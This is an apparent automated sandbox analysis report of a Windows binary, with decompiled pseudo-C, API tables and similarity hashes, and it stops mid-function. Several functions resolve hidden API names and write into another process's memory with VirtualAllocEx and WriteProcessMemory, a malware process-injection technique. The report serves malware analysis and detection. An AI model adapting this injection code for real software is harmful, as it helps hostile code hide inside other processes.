0x005cf6f0
0x005cf6f3
0x00000000
0x00000000
0x005cf6f5
0x005cf6ff
0x00000000
0x005cf6ff
0x005cf709
0x005cf713
0x005cf718
0x005cf71a
0x005cf722
0x005cf722
0x005cf726
0x00000000
0x00000000
0x005cf728
0x005cf72b
0x005cf72b
0x005cf72c
0x00000000
0x00000000
0x005cf72e
0x005cf75c
0x005cf75c
0x00000000
0x005cf75c
0x005cf735
0x005cf735
0x005cf737
0x005cf737
0x005cf739
0x005cf741
0x005cf744
0x00000000
0x00000000
0x005cf746
0x005cf74a
0x005cf74a
0x005cf74d
0x005cf74f
0x00000000
0x00000000
0x005cf751
0x005cf756
0x00000000
0x005cf756
0x005cf7ae
0x005cf7be
0x005cf7c1
0x005cf7c2
0x005cf7c3
0x005cf7c8
0x005cf7c9
0x005cf7cb
0x005cf7d0
0x005cf7d3
0x005cf7d5
0x005cf7e1
0x005cf7e7
0x005cf7e9
0x005cf7e9
0x00000000
0x005cf7d5
0x005cf65e
0x005cf664
0x005cf666
0x00000000
0x00000000
0x00000000
0x005cf666
0x005cf69d
0x00000000
0x005cf69d
0x005cf62e

APIs

GetSystemDirectoryW.KERNEL32(?,00000200), ref: 005CF5EC
CloseHandle.KERNEL32(?), ref: 005CF7E1
CloseHandle.KERNEL32(?), ref: 005CF7E7

Strings

z, xrefs: 005CF6FF

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseHandle$DirectorySystem
String ID: z
API String ID: 1693769833-1657960367
Opcode ID: cd93b84d0c1072f9be1d6ddc8c4292f9c5d21c7f3999de1d6b6ec79d344b1e91
Instruction ID: 4607d989b8331acd5a24606e44e17aba59ac92b8faeaca2d7003a925940eb94a
Opcode Fuzzy Hash: cd93b84d0c1072f9be1d6ddc8c4292f9c5d21c7f3999de1d6b6ec79d344b1e91
Instruction Fuzzy Hash: 1751D0B0A043019FDB209FA4D949F6BBBE6FFC0704F14843EE5448B2A1E77A9945C796

Uniqueness

Uniqueness Score: -1.00%

Function 005D5C10, Relevance: 6.3, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E005D5C10(void* __ecx, void* __eflags) {
				void* _t18;
				void* _t20;
				void* _t21;
				int _t24;
				void* _t32;

				_t32 = __ecx;
				if(E005C1F50(_t18, __ecx) != 0) {
					E005CDCC0(__ecx,  *((intOrPtr*)(__ecx + 0x44)));
				}
				_t20 =  *(_t32 + 0x70);
				if(_t20 != 0) {
					CloseHandle(_t20);
					 *(_t32 + 0x70) = 0;
				}
				_t21 =  *(_t32 + 0x74);
				if(_t21 != 0) {
					CloseHandle(_t21);
					 *(_t32 + 0x74) = 0;
				}
				 *((intOrPtr*)(_t32 + 0x80)) = 0;
				 *((intOrPtr*)(_t32 + 0x44)) = 0;
				 *((intOrPtr*)(_t32 + 0x94)) = 0;
				 *((intOrPtr*)(_t32 + 0x98)) = 0;
				 *((intOrPtr*)(_t32 + 0x7c)) = 0;
				 *((intOrPtr*)(_t32 + 0x78)) = 0;
				CloseHandle( *(_t32 + 0x88));
				 *(_t32 + 0x88) = 0;
				CloseHandle( *(_t32 + 0x8c));
				 *(_t32 + 0x8c) = 0;
				_t24 = CloseHandle( *(_t32 + 0x90));
				 *(_t32 + 0x90) = 0;
				return _t24;
			}

0x005d5c13
0x005d5c1c
0x005d5c23
0x005d5c23
0x005d5c28
0x005d5c2d
0x005d5c30
0x005d5c36
0x005d5c36
0x005d5c3d
0x005d5c42
0x005d5c45
0x005d5c4b
0x005d5c4b
0x005d5c5a
0x005d5c60
0x005d5c63
0x005d5c69
0x005d5c6f
0x005d5c72
0x005d5c7b
0x005d5c7d
0x005d5c89
0x005d5c8b
0x005d5c97
0x005d5c99
0x005d5ca2

APIs

Part of subcall function 005C1F50: GetExitCodeThread.KERNEL32(?,?,?,?,005C391B), ref: 005C1F6A

CloseHandle.KERNEL32(?), ref: 005D5C30
CloseHandle.KERNEL32(?), ref: 005D5C45
CloseHandle.KERNEL32(?), ref: 005D5C7B
CloseHandle.KERNEL32(?), ref: 005D5C89
CloseHandle.KERNEL32(?), ref: 005D5C97

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseHandle$CodeExitThread
String ID:
API String ID: 1430014291-0
Opcode ID: 6d7d6480530fcbf972ed5ac5844bf8a09251e7bbd4e86cac2279bd0b12497784
Instruction ID: 327ee4fbd544c285fa50dd402b7ac5b5718d4daac4b52d246c07d20fd4642e7d
Opcode Fuzzy Hash: 6d7d6480530fcbf972ed5ac5844bf8a09251e7bbd4e86cac2279bd0b12497784
Instruction Fuzzy Hash: 960140B0611B009BD7319F7AD948B47FFE9BF94741F40881FA6AAC2671DB71A8049B60

Uniqueness

Uniqueness Score: -1.00%

Function 005C7C50, Relevance: 6.2, APIs: 4, Instructions: 219
sleepstringthreadCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E005C7C50() {
				long _t42;
				void* _t44;
				long _t45;
				long _t47;
				signed int _t49;
				long _t51;
				long _t54;
				intOrPtr _t55;
				signed int _t62;
				WCHAR* _t63;
				signed int _t64;
				signed int _t65;
				long _t69;
				void* _t70;
				long _t71;
				struct _SECURITY_ATTRIBUTES* _t75;
				long _t80;
				signed int _t83;
				signed int _t86;
				signed int _t87;
				WCHAR* _t89;
				void* _t90;
				signed int _t91;
				signed int _t92;
				long _t93;
				signed int _t100;
				struct _SECURITY_ATTRIBUTES* _t102;
				void* _t104;
				WCHAR* _t107;
				void* _t108;
				DWORD* _t109;
				long* _t112;

				_t42 =  *0x5d9b9c; // 0x0
				_t102 = 0;
				 *(_t108 + 4) = 0;
				 *((intOrPtr*)(_t108 + 8)) = 0;
				if( *_t42 == 1) {
					L44:
					return _t102;
				}
				_t44 = E005CB7A0( *0x5d9c40);
				_t109 = _t108 + 4;
				_t104 = _t44;
				_t45 =  *0x5d9b9c; // 0x0
				_t102 = 0;
				_t90 =  *_t45;
				if(_t90 == 0) {
					__eflags =  *(_t45 + 0x10);
					if(__eflags != 0) {
						L13:
						E005C9DB0(__eflags);
						_t47 =  *0x5d9b9c; // 0x0
						_t49 = E005D4610(_t109[0x3c], 0x19, _t47 + 4);
						_t109 =  &(_t109[3]);
						__eflags = _t49;
						if(_t49 == 0) {
							L42:
							if(_t104 != 0) {
								E005C91E0(_t104);
							}
							goto L44;
						}
						_t51 =  *0x5d9b9c; // 0x0
						_t91 =  *(_t51 + 4);
						__eflags = _t91;
						if(_t91 == 0) {
							goto L42;
						}
						__eflags =  *_t91;
						_t109[3] = _t51;
						if( *_t91 == 0) {
							_t100 = _t91;
							_t83 = _t91;
							L26:
							__eflags = _t100 - _t91;
							if(_t100 <= _t91) {
								L41:
								_t102 = 0;
								__eflags = 0;
								CreateThread(0, 0, E005D6DB0, 0, 0, _t109);
								Sleep(0x1f4);
								goto L42;
							}
							__eflags = _t83 - _t91 - 0x3ff;
							if(_t83 - _t91 > 0x3ff) {
								goto L41;
							}
							_t107 = _t100 - 2;
							while(1) {
								__eflags = _t107 - _t91;
								if(_t107 <= _t91) {
									break;
								}
								_t65 =  *_t107 & 0x0000ffff;
								_t107 =  &(_t107[0xffffffffffffffff]);
								__eflags = _t65 - 0x2f;
								if(_t65 != 0x2f) {
									continue;
								}
								_t107 =  &(_t107[2]);
								__eflags = _t107;
								break;
							}
							_t54 = _t109[3];
							__eflags = _t107 - _t100;
							if(_t107 >= _t100) {
								L38:
								_t92 =  *(_t54 + 0x14);
								__eflags = _t92;
								if(_t92 != 0) {
									E005C91E0(_t92);
									_t109 =  &(_t109[1]);
									_t54 =  *0x5d9b9c; // 0x0
								}
								_t86 = _t83 + 0x00000002 - _t107 & 0xfffffffe;
								__eflags = _t86;
								 *(_t54 + 0x18) = _t86;
								_t55 = E005C3180(_t86, 0);
								_t93 =  *0x5d9b9c; // 0x0
								 *((intOrPtr*)(_t93 + 0x14)) = _t55;
								E005CC400(_t55, _t107,  *((intOrPtr*)(_t93 + 0x18)));
								_t109 =  &(_t109[5]);
								goto L41;
							}
							E005D4520( &(_t109[5]), 0x9e);
							_t112 =  &(_t109[2]);
							_t62 = E005D7BE0( &(_t112[7]),  &(_t112[7]), _t112,  &(_t112[4]));
							_t109 =  &(_t112[3]);
							__eflags = _t62;
							if(_t62 == 0) {
								L37:
								_t54 =  *0x5d9b9c; // 0x0
								goto L38;
							}
							_t63 =  *_t109;
							__eflags = _t63;
							if(_t63 == 0) {
								goto L37;
							}
							__eflags = _t109[4];
							if(_t109[4] == 0) {
								goto L37;
							}
							_t64 = lstrcmpiW(_t107, _t63);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L42;
							}
							goto L37;
						}
						_t87 = _t91 + 2;
						while(1) {
							_t100 = _t87;
							__eflags = _t87 - _t91 - 0x400;
							if(_t87 - _t91 >= 0x400) {
								break;
							}
							__eflags =  *_t100;
							_t87 = _t100 + 2;
							if( *_t100 != 0) {
								continue;
							}
							_t83 = _t87 + 0xfffffffe;
							goto L26;
						}
						_t83 = _t100;
						goto L26;
					}
					_t89 =  &(_t109[5]);
					E005D4520(_t89, 0x9e);
					_t109 =  &(_t109[2]);
					__eflags = GetFileAttributesW(_t89) & 0x00000010;
					if(__eflags != 0) {
						goto L42;
					}
					goto L13;
				}
				if(_t90 != 2) {
					goto L42;
				}
				_t102 = 0;
				 *_t45 = 0;
				if( *((intOrPtr*)(_t45 + 8)) != 0 &&  *((intOrPtr*)(_t45 + 0xc)) != 0) {
					if( *((intOrPtr*)(_t45 + 0x14)) != 0 &&  *((intOrPtr*)(_t45 + 0x18)) != 0) {
						E005D4520( &(_t109[5]), 0x9e);
						_t80 =  *0x5d9b9c; // 0x0
						E005C6270(_t80,  &(_t109[5]),  *((intOrPtr*)(_t80 + 0x14)),  *((intOrPtr*)(_t80 + 0x18)));
						_t109 =  &(_t109[5]);
					}
					E005D30C0(_t109);
					_t69 =  *0x5d9b9c; // 0x0
					_t70 = E005D6F80( *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0xc)),  &(_t109[1]),  &(_t109[2]));
					_t109 =  &(_t109[4]);
					_t121 = _t70;
					if(_t70 == 0) {
						_t102 = 0;
						__eflags = 0;
					} else {
						_push(_t109[0x3d]);
						_push(_t109[3]);
						_push(_t109[3]);
						_t75 = E005D05C0(_t121);
						_t109 =  &(_t109[3]);
						_t102 = _t75;
						_t76 = _t109[1];
						if(_t109[1] != 0) {
							E005C91E0(_t76);
							_t109 =  &(_t109[1]);
							_t109[1] = 0;
							_t109[2] = 0;
						}
					}
					_t71 =  *0x5d9b9c; // 0x0
					_t72 =  *(_t71 + 8);
					if( *(_t71 + 8) != 0) {
						E005C91E0(_t72);
						_t109 =  &(_t109[1]);
						_t72 =  *0x5d9b9c; // 0x0
						 *((intOrPtr*)(_t72 + 8)) = 0;
						 *((intOrPtr*)(_t72 + 0xc)) = 0;
					}
					E005D03D0(_t72);
				}
			}

0x005c7c5a
0x005c7c5f
0x005c7c61
0x005c7c65
0x005c7c6c
0x005c7efa
0x005c7f06
0x005c7f06
0x005c7c78
0x005c7c7d
0x005c7c80
0x005c7c82
0x005c7c87
0x005c7c89
0x005c7c8d
0x005c7d4e
0x005c7d52
0x005c7d75
0x005c7d7c
0x005c7d81
0x005c7d8d
0x005c7d92
0x005c7d95
0x005c7d97
0x005c7eed
0x005c7eef
0x005c7ef2
0x005c7ef7
0x00000000
0x005c7eef
0x005c7d9d
0x005c7da2
0x005c7da5
0x005c7da7
0x00000000
0x00000000
0x005c7dad
0x005c7db1
0x005c7db5
0x005c7e04
0x005c7e06
0x005c7e0c
0x005c7e0c
0x005c7e0e
0x005c7ece
0x005c7ed0
0x005c7ed0
0x005c7edc
0x005c7ee7
0x00000000
0x005c7ee7
0x005c7e18
0x005c7e1e
0x00000000
0x00000000
0x005c7e24
0x005c7e27
0x005c7e27
0x005c7e29
0x00000000
0x00000000
0x005c7e2b
0x005c7e2f
0x005c7e32
0x005c7e35
0x00000000
0x00000000
0x005c7e37
0x005c7e37
0x00000000
0x005c7e37
0x005c7e3a
0x005c7e3e
0x005c7e40
0x005c7e8d
0x005c7e8d
0x005c7e90
0x005c7e92
0x005c7e95
0x005c7e9a
0x005c7e9d
0x005c7e9d
0x005c7ea7
0x005c7ea7
0x005c7eaa
0x005c7eb0
0x005c7eb8
0x005c7ebe
0x005c7ec6
0x005c7ecb
0x00000000
0x005c7ecb
0x005c7e4c
0x005c7e51
0x005c7e61
0x005c7e66
0x005c7e69
0x005c7e6b
0x005c7e88
0x005c7e88
0x00000000
0x005c7e88
0x005c7e6d
0x005c7e70
0x005c7e72
0x00000000
0x00000000
0x005c7e78
0x005c7e7a
0x00000000
0x00000000
0x005c7e7e
0x005c7e84
0x005c7e86
0x00000000
0x00000000
0x00000000
0x005c7e86
0x005c7db7
0x005c7dba
0x005c7dba
0x005c7dbe
0x005c7dc4
0x00000000
0x00000000
0x005c7dc6
0x005c7dca
0x005c7dcd
0x00000000
0x00000000
0x005c7dcf
0x00000000
0x005c7dcf
0x005c7e0a
0x00000000
0x005c7e0a
0x005c7d54
0x005c7d5e
0x005c7d63
0x005c7d6d
0x005c7d6f
0x00000000
0x00000000
0x00000000
0x005c7d6f
0x005c7c96
0x00000000
0x00000000
0x005c7c9c
0x005c7c9e
0x005c7ca3
0x005c7cb7
0x005c7cc9
0x005c7cd1
0x005c7cdd
0x005c7ce2
0x005c7ce2
0x005c7ce7
0x005c7cec
0x005c7d01
0x005c7d06
0x005c7d09
0x005c7d0b
0x005c7dd4
0x005c7dd4
0x005c7d11
0x005c7d11
0x005c7d18
0x005c7d1c
0x005c7d20
0x005c7d25
0x005c7d28
0x005c7d2a
0x005c7d30
0x005c7d37
0x005c7d3c
0x005c7d41
0x005c7d45
0x005c7d45
0x005c7d30
0x005c7dd6
0x005c7ddb
0x005c7de0
0x005c7de3
0x005c7de8
0x005c7deb
0x005c7df2
0x005c7df5
0x005c7df5
0x005c7dfa
0x005c7dfa

APIs

GetFileAttributesW.KERNEL32(?), ref: 005C7D67
lstrcmpiW.KERNEL32(?,00000000), ref: 005C7E7E
CreateThread.KERNEL32(00000000,00000000,005D6DB0,00000000,00000000), ref: 005C7EDC
Sleep.KERNEL32(000001F4), ref: 005C7EE7

Part of subcall function 005C6270: CreateFileW.KERNEL32(005D077D,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 005C628D
Part of subcall function 005C6270: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005C62A8
Part of subcall function 005C6270: CloseHandle.KERNEL32(00000000), ref: 005C62B6

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: File$Create$AttributesCloseHandleSleepThreadWritelstrcmpi
String ID:
API String ID: 357108698-0
Opcode ID: 68ecbbdb4bb818ddffea97aede051dced066ef77d63f59a2ada338887f7032dd
Instruction ID: 75c600ee3f2ef33f6bd192f72880da98091a9fc065560692f04d6783c7da8178
Opcode Fuzzy Hash: 68ecbbdb4bb818ddffea97aede051dced066ef77d63f59a2ada338887f7032dd
Instruction Fuzzy Hash: 5B71A672618206AFDB24EF64EC49F2A7BA8BF94304F05446FF40987661E731DD04DB52

Uniqueness

Uniqueness Score: -1.00%

Function 005D0300, Relevance: 6.1, APIs: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E005D0300(intOrPtr* __ecx, void* __edx) {
				void* _t14;
				void* _t28;
				signed int _t30;
				void* _t33;
				signed int _t34;
				void* _t35;
				intOrPtr* _t37;
				signed int _t38;
				intOrPtr* _t39;
				void* _t40;
				signed int* _t41;

				_t33 = __edx;
				_t34 = 0;
				_t37 = __ecx;
				 *_t39 = 0;
				 *0x5d9d54(0x5d9bbc);
				_t43 =  *__ecx;
				if( *__ecx != 0) {
					while(E005D5020( *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)) + _t34 * 4)), _t43, 0) != 0) {
						_t34 = _t34 + 1;
						if(_t34 <  *_t37) {
							continue;
						}
						goto L3;
					}
					 *0x5d9d9c(0x5d9bbc);
					__eflags = 0;
					return 0;
				}
				L3:
				 *0x5d9d9c(0x5d9bbc);
				_t35 = _t39 + 4;
				E005D4520(_t35, 0x24);
				_t40 = _t39 + 8;
				_push(_t40);
				_push(_t35);
				_t14 = E005CD4B0();
				_t41 = _t40 + 8;
				_t28 = _t14;
				if(_t28 != 0) {
					_t30 =  *_t41;
					if(_t30 <= 0) {
						while(1) {
							L9:
							_t17 = _t30 - 1;
							 *_t41 = _t30 - 1;
							if(_t30 == 0) {
								break;
							}
							E005C91E0( *((intOrPtr*)(_t28 + _t17 * 4)));
							_t41 =  &(_t41[1]);
							_t30 =  *_t41;
						}
						E005C91E0(_t28);
						return 1;
					}
					_t38 = 0;
					do {
						E005C6570(_t37, _t33, 0, PathFindFileNameW( *(_t28 + _t38 * 4)));
						_t30 =  *_t41;
						_t38 = _t38 + 1;
					} while (_t38 < _t30);
					goto L9;
				}
				return 1;
			}

0x005d0300
0x005d030a
0x005d030c
0x005d030e
0x005d0316
0x005d031c
0x005d031e
0x005d0320
0x005d0335
0x005d0338
0x00000000
0x00000000
0x00000000
0x005d0338
0x005d03ba
0x005d03c0
0x00000000
0x005d03c0
0x005d033a
0x005d033f
0x005d0345
0x005d034c
0x005d0351
0x005d0356
0x005d0357
0x005d0358
0x005d035d
0x005d0360
0x005d0367
0x005d0369
0x005d036e
0x005d039d
0x005d039d
0x005d039d
0x005d03a2
0x005d03a5
0x00000000
0x00000000
0x005d0392
0x005d0397
0x005d039a
0x005d039a
0x005d03a8
0x00000000
0x005d03b2
0x005d0376
0x005d0378
0x005d0380
0x005d0385
0x005d0388
0x005d0389
0x00000000
0x005d038d
0x005d03cc

APIs

RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D0316
RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D033F
PathFindFileNameW.SHLWAPI(00000000), ref: 005D037B

Part of subcall function 005D5020: GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005D5064

RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D03BA

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CriticalSection$LeaveNamePath$EnterFileFindFull
String ID:
API String ID: 133812498-0
Opcode ID: ccb510744b812cca53090352485e72868562261e3048438e6005baa9aef08d5b
Instruction ID: 785a6705e91bb70197e8cb27b6c77d5035d4a3dcd8f08e16eaa15e6e4423782d
Opcode Fuzzy Hash: ccb510744b812cca53090352485e72868562261e3048438e6005baa9aef08d5b
Instruction Fuzzy Hash: 141199316052029BDB307B6DEC49B3A7FA5FF90705F05182FE449C6391E6615805D752

Uniqueness

Uniqueness Score: -1.00%

Function 005C6740, Relevance: 6.1, APIs: 4, Instructions: 71
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E005C6740(void* __ecx, void* __eflags, intOrPtr _a4) {
				char _v212;
				char _v312;
				char _v316;
				WCHAR* _v320;
				_Unknown_base(*)()* _t16;
				void* _t21;
				void* _t24;
				CHAR* _t28;
				void* _t29;
				WCHAR* _t31;
				_Unknown_base(*)()* _t32;
				void* _t33;
				void* _t34;
				void* _t36;

				_t33 = __ecx;
				_t31 =  &_v212;
				_v320 = 0;
				_v316 = 0;
				E005D4520(_t31, 0x56);
				_t28 =  &_v312;
				E005D7160(_t28, 0x57);
				_t36 = _t34 + 0x10;
				_t16 = GetProcAddress(GetModuleHandleW(_t31), _t28);
				if(_t16 != 0) {
					_t32 = _t16;
					_t21 = E005CC380(_a4, 0, _t36, 0xffffffff);
					_t36 = _t36 + 0x10;
					if(_t21 != 0) {
						_t24 = E005C9CD0(lstrlenW(_v320) + _t22 + 2,  *(_t33 + 0x70), _v320, lstrlenW(_v320) + _t22 + 2);
						_t36 = _t36 + 0xc;
						if(_t24 != 0) {
							_t29 = _t24;
							_push(_t29);
							_push( &_v316);
							_push(1);
							_push(_t32);
							_push(_t33);
							E005D3FA0();
							_t36 = _t36 + 0x14;
							VirtualFreeEx( *(_t33 + 0x70), _t29, 0, 0x8000);
						}
					}
				}
				_t17 = _v320;
				if(_v320 != 0) {
					E005C91E0(_t17);
				}
				return _v316;
			}

0x005c674b
0x005c674d
0x005c6751
0x005c6754
0x005c675b
0x005c6763
0x005c676a
0x005c676f
0x005c677b
0x005c6783
0x005c6785
0x005c6795
0x005c679a
0x005c679f
0x005c67b6
0x005c67bb
0x005c67c0
0x005c67c2
0x005c67c8
0x005c67c9
0x005c67ca
0x005c67cc
0x005c67cd
0x005c67ce
0x005c67d3
0x005c67e1
0x005c67e1
0x005c67c0
0x005c679f
0x005c67e7
0x005c67ec
0x005c67ef
0x005c67f4
0x005c6804

APIs

GetModuleHandleW.KERNEL32(?), ref: 005C6773
GetProcAddress.KERNEL32(00000000,?), ref: 005C677B

Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,005C8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 005CC396
Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 005CC3C4

lstrlenW.KERNEL32 ref: 005C67A4

Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07

Part of subcall function 005D3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3FCD
Part of subcall function 005D3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4070
Part of subcall function 005D3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 005D4095

VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 005C67E1

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: MemoryProcessVirtual$AllocByteCharMultiWideWrite$AddressFreeHandleModuleProcReadlstrlen
String ID:
API String ID: 2912094857-0
Opcode ID: 8e60df8ae4f37bc7d8ed8c7dd5a1315e4c74b55def4c9ae02acae3dd1b2a5f6e
Instruction ID: c91d7037c7a4ec58ed77151abd682bba29ca411a0c5d3328ed56e08b9de0db99
Opcode Fuzzy Hash: 8e60df8ae4f37bc7d8ed8c7dd5a1315e4c74b55def4c9ae02acae3dd1b2a5f6e
Instruction Fuzzy Hash: 2211B4B6A04201BFE721AB64EC4EF6B7BECFF84745F04082AF944D2291E635D914D662

Uniqueness

Uniqueness Score: -1.00%

Function 005D3100, Relevance: 6.1, APIs: 4, Instructions: 62
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E005D3100(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v212;
				char _v312;
				_Unknown_base(*)()* _t10;
				void* _t17;
				CHAR* _t18;
				_Unknown_base(*)()* _t19;
				WCHAR* _t21;
				void* _t22;
				void* _t23;
				long* _t24;
				long* _t26;

				_t23 = __ecx;
				 *_t24 = 0;
				_t21 =  &_v212;
				E005D4520(_t21, 0x56);
				_t18 =  &_v312;
				E005D7160(_t18, 0x9b);
				_t26 =  &(_t24[4]);
				_t10 = GetProcAddress(GetModuleHandleW(_t21), _t18);
				if(_t10 == 0) {
					L7:
					return  *_t26;
				}
				_t22 = _a8;
				_t19 = _t10;
				if(_t22 >= 0x10000) {
					_push(_t22);
					_t17 = E005C9CD0( *0x5d9d28() + 1,  *(_t23 + 0x70), _t22,  *0x5d9d28() + 1);
					_t26 =  &(_t26[3]);
					_t22 = _t17;
				}
				if(_t22 != 0) {
					_push(_t22);
					_push(_a4);
					_push(_t26);
					_push(2);
					_push(_t19);
					_push(_t23);
					E005D3FA0();
					_t26 =  &(_t26[6]);
					if(_t22 >= 0x10000 && _t22 != 0) {
						VirtualFreeEx( *(_t23 + 0x70), _t22, 0, 0x8000);
					}
				}
				goto L7;
			}

0x005d3109
0x005d310b
0x005d3112
0x005d3119
0x005d3121
0x005d312b
0x005d3130
0x005d313c
0x005d3144
0x005d31a6
0x005d31b2
0x005d31b2
0x005d3146
0x005d314d
0x005d3155
0x005d3157
0x005d3164
0x005d3169
0x005d316c
0x005d316c
0x005d3170
0x005d3174
0x005d3175
0x005d317c
0x005d317d
0x005d317f
0x005d3180
0x005d3181
0x005d3186
0x005d318f
0x005d31a0
0x005d31a0
0x005d318f
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 005D3134
GetProcAddress.KERNEL32(00000000,?), ref: 005D313C
lstrlen.KERNEL32(?), ref: 005D3158

Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005D31A0

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Virtual$AddressAllocFreeHandleMemoryModuleProcProcessWritelstrlen
String ID:
API String ID: 2409309907-0
Opcode ID: 286d3f4b92a30bc589f60e39ebdb108915a40ec7b0414cb6532d953ca873b2f4
Instruction ID: 02ac6473843eb1d5d4a8e9e4d11dd7c7010eae9ac69942a58a57b8c5ae374cbe
Opcode Fuzzy Hash: 286d3f4b92a30bc589f60e39ebdb108915a40ec7b0414cb6532d953ca873b2f4
Instruction Fuzzy Hash: 9111E572A003016BE331A768EC4DF6F7BBAFBD4741F04042BF54892251E6354945D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 005C7440, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005C7440(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				char _v216;
				intOrPtr _v220;
				signed int _v224;
				WCHAR* _v228;
				intOrPtr _v232;
				intOrPtr _v244;
				char _v248;
				struct _STARTUPINFOW _v316;
				signed int _v320;
				long _t42;
				WCHAR* _t43;
				int _t46;
				signed int _t51;
				intOrPtr _t54;
				signed int _t56;
				signed int _t63;
				signed int _t64;
				struct _PROCESS_INFORMATION* _t65;
				intOrPtr _t69;
				char* _t72;
				signed int _t73;
				short _t74;
				signed int _t75;
				void* _t77;
				intOrPtr* _t79;

				_t69 = __ecx;
				_t72 =  &(_v316.lpReserved);
				E005D6610(_t72, 0, 0x128);
				 *((intOrPtr*)(_t72 - 4)) = 0x44;
				GetStartupInfoW( &_v316);
				E005D4520( &_v216, 0x55);
				_t79 = _t77 + 0x14;
				_t42 = 4;
				_t51 = 0;
				while( *((short*)(_t79 + 0x6c + _t51 * 2)) != 0) {
					_t51 = _t51 + 1;
					_t42 = _t42 + 2;
					if(_t51 != 0x7fffffff) {
						continue;
					} else {
						_v224 = 0;
						_v220 = 0x80070057;
						L18:
						_t43 = _v228;
						L19:
						if(_t43 != 0) {
							E005C91E0(_t43);
						}
						return _v232;
					}
				}
				_v224 = _t51;
				_v220 = 0;
				_t43 = E005C3180(_t42, 0);
				_t79 = _t79 + 8;
				__eflags = _t43;
				_v228 = _t43;
				if(_t43 == 0) {
					goto L19;
				}
				_t63 = _v224;
				__eflags = _t63 + 2;
